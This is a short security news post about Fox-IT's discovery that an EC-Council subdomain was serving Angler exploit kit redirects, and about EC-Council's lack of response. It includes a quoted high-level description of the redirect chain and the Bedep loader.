A ransomware was found on the official website of EC-Council that runs Certified Ethical hacker program. After EC-Council did not reply to Fox-IT in the context of the malware injected in their site, Fox-IT decided to go public with this news, the excerpt of which can be read at the end of this blog post.
The website http://iclass.eccouncil.org/, the official website of EC-Council, a new Mexico-based professional organization that runs the Certified Ethical Hacker program, the nemesis of a malware was found this Monday.
Shortly after the malware was found, researchers from security firm Fox-ITnotified EC-Council officials found that one of their subdomains was under the influence of a schemer who had injected angler, a toolkit that provides powerful Web drive-by exploits.
On Thursday, after receiving no reply from the EC-Council and still seeing that the website was infected, Fox-IT published a blog post showing that the company had failed to respond them.
Unlike other drive-by attacks, this one is very hard for the researchers to replicate. Moreover, this exploit only targets the visitors using Internet Explorer and only when they come to the site from search engines like Google, Bing, Yahoo etc. Even though these conditions are met, people from certain IP addresses from certain geographic locales are also spared.
Here is an excerpt from the Fox-IT team:
Through this embedding the client is redirected a couple of times to avoid/frustrate/stop manual analysis and some automated systems. Once the user has jumped through all the redirects he/she ends up on the Angler exploit kit landing page from which the browser, flash player plugin or Silverlight plugin will be exploited. The Angler exploit kit first starts the ‘Bedep’ loader on an exploited victim machine which will download the final payload. The way the redirect occurs on the EC-COUNCIL website is through PHP code on the web server which is injecting the redirect into the web page. A vulnerability in the EC-COUNCIL website is most likely exploited as it runs the very popular WordPress CMS which has been a target through vulnerable plug-ins for years.